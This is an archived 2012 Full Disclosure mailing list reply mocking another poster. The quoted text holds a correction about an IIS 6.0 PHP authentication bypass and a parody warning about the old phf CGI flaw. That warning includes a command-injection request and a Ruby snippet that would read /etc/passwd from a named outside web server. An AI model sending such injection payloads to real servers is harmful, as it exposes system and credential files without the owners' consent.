Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin

From: Gage Bystrom <themadichib0d () gmail com>
Date: Tue, 17 Jul 2012 10:09:13 -0700
Hello Full Disclosure! I is warn you about musntlive!

He is use old joke over over again. Not funny!

----------

I actually got nothing against you personally but its boring when you use
the same tactic over and over :/ mix things up and make it interesting!
On Jul 17, 2012 8:24 AM, "Григорий Братислава" <musntlive () gmail com> wrote:


On Tue, Jul 17, 2012 at 10:11 AM, king cope
<isowarez.isowarez.isowarez () googlemail com> wrote:

Hello Jan,
I did some additional tests for the IIS bugs.

* IIS 6.0 PHP authentication bypass is only possible on Windows Server
2003 SP1. SP2 seems unaffected
  So take that bug as resolved, my mistake as I didn't have a fully
patched system online when testing.


kingcope are we is release advisories to patched software? Is so, then
I introduce exploit along with you.

Hello full disclosure!! !! !!

Is like to warn you about phf vulnerability. Is hackers can get your
password list in is unpatched server.

PoC on is my system:

213.24.76.77 - - [17/July/2012:23:17:47 -0700] "GET
/cgi-bin/phf?Qalias=3Dx%0a/bin/cat%20/etc/passwd HTTP/1.0" 500 -

In Ruby (here we is own rsnake):

require 'open-uri'
open('
http://www.webfringe.org/cgi-bin/phf?Qalias=3Dx%0a/bin/cat%20/etc/passwd
HTTP/1.0'){ |f| print f.read }

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: